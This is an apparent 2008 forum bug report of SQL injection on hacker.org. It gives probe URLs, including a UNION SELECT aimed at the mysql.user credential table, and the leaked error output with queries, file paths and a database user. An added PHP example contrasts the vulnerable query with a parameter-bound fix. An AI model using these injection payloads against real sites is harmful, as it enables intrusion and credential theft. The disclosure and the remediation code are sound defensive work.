little bug.......sql injection
Posted: Thu Aug 14, 2008 7:27 pm
http://www.hacker.org/challenge/chal.php?id=39'
result:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/challenge/chal.php on line 35
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND solved = 1' at line 1, qry: SELECT COUNT(*) FROM challengeresult WHERE chalid = 39' AND solved = 1
http://www.hacker.org/worm/?botid=41%20 ... mysql.user
result:
SELECT command denied to user 'hacker_phpbb'@'geyser.dreamhost.com' for table 'user', qry: SELECT arena FROM bots WHERE id = 41 union select 1 from mysql.user
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/.mazie/bok/hacker.org/worm/worm.php on line 33
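The error output in the post above shows the request value pasted straight into the SQL text, and the full query and file path echoed back to the browser. The following is an added example, not code from hacker.org: the schema, data and function names are constructed, and SQLite via PDO stands in for MySQL so it runs offline. It puts that query shape beside a validated, parameter-bound version that returns no SQL detail to the caller:

```php
<?php
// Constructed schema and rows; in-memory SQLite stands in for the site's MySQL.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE challengeresult (chalid INTEGER, solved INTEGER)');
$db->exec('INSERT INTO challengeresult VALUES (39, 1), (39, 1), (39, 0), (40, 1)');

// Before: the shape visible in the error output, request value concatenated into SQL.
function solved_count_concat(PDO $db, string $id): int {
    $qry = "SELECT COUNT(*) FROM challengeresult WHERE chalid = $id AND solved = 1";
    return (int) $db->query($qry)->fetchColumn();
}

// After: accept only a positive integer, then bind it as a typed parameter.
// Failures are logged server-side; the caller gets null, never SQL text or a path.
function solved_count_bound(PDO $db, string $id): ?int {
    $chalid = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($chalid === false) {
        return null; // rejected before any query is built
    }
    try {
        $stmt = $db->prepare(
            'SELECT COUNT(*) FROM challengeresult WHERE chalid = :id AND solved = 1'
        );
        $stmt->bindValue(':id', $chalid, PDO::PARAM_INT);
        $stmt->execute();
        return (int) $stmt->fetchColumn();
    } catch (PDOException $e) {
        error_log('solved_count_bound failed: ' . $e->getMessage());
        return null;
    }
}

// The two id values are the ones from the post: the normal id and the id with a quote.
foreach (['39', "39'"] as $input) {
    try {
        $before = (string) solved_count_concat($db, $input);
    } catch (PDOException $e) {
        $before = 'SQL error'; // on the site this error was printed to the page
    }
    $after = solved_count_bound($db, $input);
    printf("%-4s concat=%-10s bound=%s\n", $input, $before, var_export($after, true));
}
```

Setting `display_errors` to off in production keeps PHP warnings such as the `mysql_fetch_array()` one, and the file path they carry, out of the response as well.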